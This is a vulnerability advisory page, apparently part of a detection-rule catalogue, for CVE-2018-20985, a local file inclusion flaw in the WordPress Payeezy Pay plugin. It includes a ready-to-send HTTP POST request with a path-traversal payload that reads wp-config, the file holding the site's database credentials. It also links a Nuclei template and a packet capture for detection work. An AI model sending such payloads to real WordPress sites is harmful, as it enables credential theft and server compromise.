🔙 목록으로 돌아가기

CVE-2018-20985: WordPress Payeezy Pay <=2.97 - Local File Inclusion

TitleWordPress Payeezy Pay <=2.97 - Local File Inclusion
Authordaffainfo
SeverityCritical
ImpactThe vulnerability allows an attacker to include local files and execute arbitrary code on the server.
RemediationUpdate to the latest version of WordPress Payeezy Pay plugin.
CVSS Score9.8
EPSS Score0.42918
CVE IDCVE-2018-20985
CWE IDCWE-20
Tags cve cve2018 wordpress lfi plugin payeezy vuln

🔍 Vulnerability Description

WordPress Plugin WP Payeezy Pay is prone to a local file inclusion vulnerability because it fails to sufficiently verify user-supplied input. Exploiting this issue may allow an attacker to obtain sensitive information that could aid in further attacks. WordPress Plugin WP Payeezy Pay version 2.97 is vulnerable; prior versions are also affected.

🌐 HTTP Request

POST /wp-content/plugins/wp-payeezy-pay/donate.php HTTP/1.1
Host: www.victim.com
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:136.0) Gecko/20100101 Firefox/136.0
Connection: close
Content-Length: 26
Accept: */*
Accept-Language: en
Accept-Encoding: gzip

x_login=../../../wp-config

📚 References


🔗 Nuclei Template: https://github.com/packetinside/nuclei-templates/blob/main/http/cves/2018/CVE-2018-20985.yaml

🦈 Packet Capture: ⬇️ Download cve-2018-20985.pcap

⚠️ Notice: These rules are for detection purposes. Please tune them before applying to a production environment.
Snort 2 Rule
N/A
Snort 3 Rule
N/A